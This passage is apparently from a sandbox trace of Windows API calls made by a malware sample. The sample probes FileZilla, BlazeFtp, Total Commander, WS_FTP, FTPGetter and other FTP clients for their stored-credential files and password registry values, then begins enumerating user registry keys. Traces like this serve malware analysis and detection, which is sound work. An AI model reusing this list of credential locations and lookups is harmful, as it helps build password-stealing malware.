hHeap=0x840000) returned 1 [0183.619] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.620] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\filezilla.xml") returned 0 [0183.620] GetProcessHeap () returned 0x840000 [0183.620] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.620] GetProcessHeap () returned 0x840000 [0183.620] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f7c) returned 0x875288 [0183.621] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.621] wvsprintfW (in: param_1=0x875288, param_2="%s\\FileZilla\\recentservers.xml", arglist=0x19f82c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 65 [0183.621] GetProcessHeap () returned 0x840000 [0183.621] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x86) returned 0x879998 [0183.621] GetProcessHeap () returned 0x840000 [0183.621] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.622] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.623] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\recentservers.xml") returned 0 [0183.623] GetProcessHeap () returned 0x840000 [0183.623] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x879998 | out: hHeap=0x840000) returned 1 [0183.623] GetProcessHeap () returned 0x840000 [0183.623] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f78) returned 0x875288 [0183.624] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.625] wvsprintfW (in: param_1=0x875288, param_2="%s\\FileZilla\\sitemanager.xml", arglist=0x19f820 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 63 [0183.625] GetProcessHeap () returned 0x840000 [0183.625] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x82) returned 0x87a0e8 [0183.625] GetProcessHeap () returned 0x840000 [0183.625] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.626] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.627] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FileZilla\\sitemanager.xml") returned 0 [0183.627] GetProcessHeap () returned 0x840000 [0183.627] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87a0e8 | out: hHeap=0x840000) returned 1 [0183.627] GetProcessHeap () returned 0x840000 [0183.627] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.628] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.629] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.629] GetProcessHeap () returned 0x840000 [0183.629] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x875288 [0183.630] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.630] wvsprintfW (in: param_1=0x875288, param_2="%s\\Staff-FTP\\sites.ini", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 42 [0183.631] GetProcessHeap () returned 0x840000 [0183.631] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0183.631] GetProcessHeap () returned 0x840000 [0183.631] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.632] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.632] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Staff-FTP\\sites.ini") returned 0 [0183.633] GetProcessHeap () returned 0x840000 [0183.633] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.633] GetProcessHeap () returned 0x840000 [0183.633] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.633] GetProcessHeap () returned 0x840000 [0183.633] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f68) returned 0x875288 [0183.633] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.634] wvsprintfW (in: param_1=0x875288, param_2="%s\\BlazeFtp\\site.dat", arglist=0x19f7e4 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 55 [0183.635] GetProcessHeap () returned 0x840000 [0183.635] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x72) returned 0x861318 [0183.635] GetProcessHeap () returned 0x840000 [0183.635] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.636] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.636] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\BlazeFtp\\site.dat") returned 0 [0183.637] GetProcessHeap () returned 0x840000 [0183.637] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x861318 | out: hHeap=0x840000) returned 1 [0183.637] GetProcessHeap () returned 0x840000 [0183.637] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0183.638] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.638] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\FlashPeak\\BlazeFtp\\Settings", pszValue="LastPassword", pdwType=0x0, pvData=0x873a58, pcbData=0x19f7e4*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f7e4*=0x104) returned 0x2 [0183.638] GetProcessHeap () returned 0x840000 [0183.638] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.638] GetProcessHeap () returned 0x840000 [0183.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.646] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.647] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.647] GetProcessHeap () returned 0x840000 [0183.647] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x875288 [0183.648] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.649] wvsprintfW (in: param_1=0x875288, param_2="%s\\Fastream NETFile\\My FTP Links", arglist=0x19f83c | out: param_1="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 52 [0183.649] GetProcessHeap () returned 0x840000 [0183.649] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6c) returned 0x871d38 [0183.649] GetProcessHeap () returned 0x840000 [0183.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.650] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.650] PathFileExistsW (pszPath="C:\\Program Files (x86)\\Fastream NETFile\\My FTP Links") returned 0 [0183.650] GetProcessHeap () returned 0x840000 [0183.650] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.650] GetProcessHeap () returned 0x840000 [0183.650] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.651] GetProcessHeap () returned 0x840000 [0183.651] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.651] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.652] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.652] GetProcessHeap () returned 0x840000 [0183.652] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f82) returned 0x875288 [0183.653] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.654] wvsprintfW (in: param_1=0x875288, param_2="%s\\GoFTP\\settings\\Connections.txt", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 53 [0183.654] GetProcessHeap () returned 0x840000 [0183.654] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6e) returned 0x871d38 [0183.654] GetProcessHeap () returned 0x840000 [0183.654] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.656] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.656] PathFileExistsW (pszPath="C:\\Program Files (x86)\\GoFTP\\settings\\Connections.txt") returned 0 [0183.657] GetProcessHeap () returned 0x840000 [0183.657] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.657] GetProcessHeap () returned 0x840000 [0183.657] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.657] GetProcessHeap () returned 0x840000 [0183.657] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f76) returned 0x875288 [0183.658] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.658] wvsprintfW (in: param_1=0x875288, param_2="%s\\Estsoft\\ALFTP\\ESTdb2.dat", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 62 [0183.658] GetProcessHeap () returned 0x840000 [0183.659] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x80) returned 0x871d38 [0183.659] GetProcessHeap () returned 0x840000 [0183.659] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.659] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.660] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Estsoft\\ALFTP\\ESTdb2.dat") returned 0 [0183.660] GetProcessHeap () returned 0x840000 [0183.660] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.660] GetProcessHeap () returned 0x840000 [0183.660] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.661] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.661] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.661] GetProcessHeap () returned 0x840000 [0183.661] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x875288 [0183.662] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.663] wvsprintfW (in: param_1=0x875288, param_2="%s\\DeluxeFTP\\sites.xml", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 42 [0183.663] GetProcessHeap () returned 0x840000 [0183.663] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x58) returned 0x871d38 [0183.663] GetProcessHeap () returned 0x840000 [0183.663] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.664] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.664] PathFileExistsW (pszPath="C:\\Program Files (x86)\\DeluxeFTP\\sites.xml") returned 0 [0183.665] GetProcessHeap () returned 0x840000 [0183.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.665] GetProcessHeap () returned 0x840000 [0183.665] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.665] GetProcessHeap () returned 0x840000 [0183.665] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.666] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.666] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Windows") returned 0x0 [0183.667] GetProcessHeap () returned 0x840000 [0183.667] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0183.668] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.669] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f840 | out: param_1="C:\\Windows\\wcx_ftp.ini") returned 22 [0183.669] GetProcessHeap () returned 0x840000 [0183.669] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x30) returned 0x8691c0 [0183.669] GetProcessHeap () returned 0x840000 [0183.669] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.670] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.670] PathFileExistsW (pszPath="C:\\Windows\\wcx_ftp.ini") returned 0 [0183.670] GetProcessHeap () returned 0x840000 [0183.670] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8691c0 | out: hHeap=0x840000) returned 1 [0183.670] GetProcessHeap () returned 0x840000 [0183.670] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.670] GetProcessHeap () returned 0x840000 [0183.670] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0183.671] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.672] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f834 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 49 [0183.672] GetProcessHeap () returned 0x840000 [0183.672] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x66) returned 0x871d38 [0183.672] GetProcessHeap () returned 0x840000 [0183.672] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.675] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.675] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\wcx_ftp.ini") returned 0 [0183.675] GetProcessHeap () returned 0x840000 [0183.675] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.675] GetProcessHeap () returned 0x840000 [0183.675] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.676] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.677] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0183.677] GetProcessHeap () returned 0x840000 [0183.677] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5c) returned 0x875288 [0183.678] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.679] wvsprintfW (in: param_1=0x875288, param_2="%s\\wcx_ftp.ini", arglist=0x19f828 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 33 [0183.679] GetProcessHeap () returned 0x840000 [0183.679] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x46) returned 0x86d108 [0183.679] GetProcessHeap () returned 0x840000 [0183.679] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.680] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.680] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\wcx_ftp.ini") returned 0 [0183.680] GetProcessHeap () returned 0x840000 [0183.680] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86d108 | out: hHeap=0x840000) returned 1 [0183.680] GetProcessHeap () returned 0x840000 [0183.680] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.681] GetProcessHeap () returned 0x840000 [0183.681] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f6c) returned 0x875288 [0183.681] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.696] wvsprintfW (in: param_1=0x875288, param_2="%s\\GHISLER\\wcx_ftp.ini", arglist=0x19f81c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 57 [0183.696] GetProcessHeap () returned 0x840000 [0183.696] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x76) returned 0x860998 [0183.696] GetProcessHeap () returned 0x840000 [0183.696] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.697] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.697] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\GHISLER\\wcx_ftp.ini") returned 0 [0183.698] GetProcessHeap () returned 0x840000 [0183.698] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x860998 | out: hHeap=0x840000) returned 1 [0183.698] GetProcessHeap () returned 0x840000 [0183.698] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0183.698] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.699] SHGetValueW (in: hkey=0x80000001, pszSubKey="Software\\Ghisler\\Total Commander", pszValue="FtpIniName", pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104 | out: pdwType=0x0, pvData=0x873a58, pcbData=0x19f81c*=0x104) returned 0x2 [0183.699] GetProcessHeap () returned 0x840000 [0183.699] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.699] GetProcessHeap () returned 0x840000 [0183.699] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.700] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.701] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.701] GetProcessHeap () returned 0x840000 [0183.701] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f80) returned 0x875288 [0183.701] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.702] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTPGetter\\Profile\\servers.xml", arglist=0x19f848 | out: param_1="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 52 [0183.702] GetProcessHeap () returned 0x840000 [0183.702] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x6c) returned 0x871d38 [0183.702] GetProcessHeap () returned 0x840000 [0183.702] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.703] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.704] PathFileExistsW (pszPath="C:\\Program Files (x86)\\FTPGetter\\Profile\\servers.xml") returned 0 [0183.704] GetProcessHeap () returned 0x840000 [0183.704] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.704] GetProcessHeap () returned 0x840000 [0183.704] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.704] GetProcessHeap () returned 0x840000 [0183.704] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f70) returned 0x875288 [0183.705] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.706] wvsprintfW (in: param_1=0x875288, param_2="%s\\FTPGetter\\servers.xml", arglist=0x19f83c | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 59 [0183.706] GetProcessHeap () returned 0x840000 [0183.706] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7a) returned 0x871d38 [0183.706] GetProcessHeap () returned 0x840000 [0183.707] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.707] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.708] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\FTPGetter\\servers.xml") returned 0 [0183.708] GetProcessHeap () returned 0x840000 [0183.708] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.709] GetProcessHeap () returned 0x840000 [0183.709] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.709] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.710] SHGetFolderPathW (in: hwnd=0x0, csidl=38, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Program Files (x86)") returned 0x0 [0183.710] GetProcessHeap () returned 0x840000 [0183.710] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f68) returned 0x875288 [0183.710] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.711] wvsprintfW (in: param_1=0x875288, param_2="%s\\WS_FTP\\WS_FTP.INI", arglist=0x19f844 | out: param_1="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 40 [0183.711] GetProcessHeap () returned 0x840000 [0183.711] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x54) returned 0x871d38 [0183.711] GetProcessHeap () returned 0x840000 [0183.711] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.712] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.712] PathFileExistsW (pszPath="C:\\Program Files (x86)\\WS_FTP\\WS_FTP.INI") returned 0 [0183.713] GetProcessHeap () returned 0x840000 [0183.713] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.713] GetProcessHeap () returned 0x840000 [0183.713] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.713] GetProcessHeap () returned 0x840000 [0183.713] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.714] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.714] SHGetFolderPathW (in: hwnd=0x0, csidl=36, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Windows") returned 0x0 [0183.714] GetProcessHeap () returned 0x840000 [0183.714] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f5a) returned 0x875288 [0183.715] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.716] wvsprintfW (in: param_1=0x875288, param_2="%s\\WS_FTP.INI", arglist=0x19f838 | out: param_1="C:\\Windows\\WS_FTP.INI") returned 21 [0183.716] GetProcessHeap () returned 0x840000 [0183.716] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x2e) returned 0x869578 [0183.716] GetProcessHeap () returned 0x840000 [0183.716] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.717] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.717] PathFileExistsW (pszPath="C:\\Windows\\WS_FTP.INI") returned 0 [0183.717] GetProcessHeap () returned 0x840000 [0183.717] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x869578 | out: hHeap=0x840000) returned 1 [0183.717] GetProcessHeap () returned 0x840000 [0183.717] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.717] GetProcessHeap () returned 0x840000 [0183.717] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.718] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.719] SHGetFolderPathW (in: hwnd=0x0, csidl=26, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming") returned 0x0 [0183.719] GetProcessHeap () returned 0x840000 [0183.719] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0183.719] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.720] wvsprintfW (in: param_1=0x875288, param_2="%s\\Ipswitch", arglist=0x19f820 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 46 [0183.720] GetProcessHeap () returned 0x840000 [0183.721] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x60) returned 0x871d38 [0183.721] GetProcessHeap () returned 0x840000 [0183.721] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.721] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.722] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\AppData\\Roaming\\Ipswitch") returned 0 [0183.722] GetProcessHeap () returned 0x840000 [0183.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.722] GetProcessHeap () returned 0x840000 [0183.722] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871d38 | out: hHeap=0x840000) returned 1 [0183.722] GetProcessHeap () returned 0x840000 [0183.722] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x208) returned 0x873a58 [0183.723] LoadLibraryW (lpLibFileName="SHELL32") returned 0x74a90000 [0183.724] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x873a58 | out: pszPath="C:\\Users\\RDhJ0CNFevzX") returned 0x0 [0183.724] GetProcessHeap () returned 0x840000 [0183.724] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3f56) returned 0x875288 [0183.725] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0183.725] wvsprintfW (in: param_1=0x875288, param_2="%s\\site.xml", arglist=0x19f848 | out: param_1="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 30 [0183.725] GetProcessHeap () returned 0x840000 [0183.725] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x865c78 [0183.726] GetProcessHeap () returned 0x840000 [0183.726] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x875288 | out: hHeap=0x840000) returned 1 [0183.726] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.727] PathFileExistsW (pszPath="C:\\Users\\RDhJ0CNFevzX\\site.xml") returned 0 [0183.727] GetProcessHeap () returned 0x840000 [0183.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x865c78 | out: hHeap=0x840000) returned 1 [0183.727] GetProcessHeap () returned 0x840000 [0183.727] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0183.820] GetProcessHeap () returned 0x840000 [0183.820] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b18 [0183.821] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.822] RegOpenKeyW (in: hKey=0x80000001, lpSubKey="Software", phkResult=0x871b18 | out: phkResult=0x871b18*=0x22c) returned 0x0 [0183.822] GetProcessHeap () returned 0x840000 [0183.822] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x410) returned 0x873a58 [0183.823] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0183.823] SHEnumKeyExW (in: hkey=0x22c, dwIndex=0x0, pszName=0x873a58, pcchName=0x19f838 | out: pszName="AppDataLow", pcchName=0x19f838) returned 0x0 [0183.823] GetProcessHeap () returned 0x840000 [0183.823] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871c28 [0183.824] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0183.824] RegOpenKeyW (in: hKey=0x22c, lpSubKey="AppDataLow", phkResult=0x871c28 | out: phkResult=0x871c28*=0x220) returned 0x0 [0183.825] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 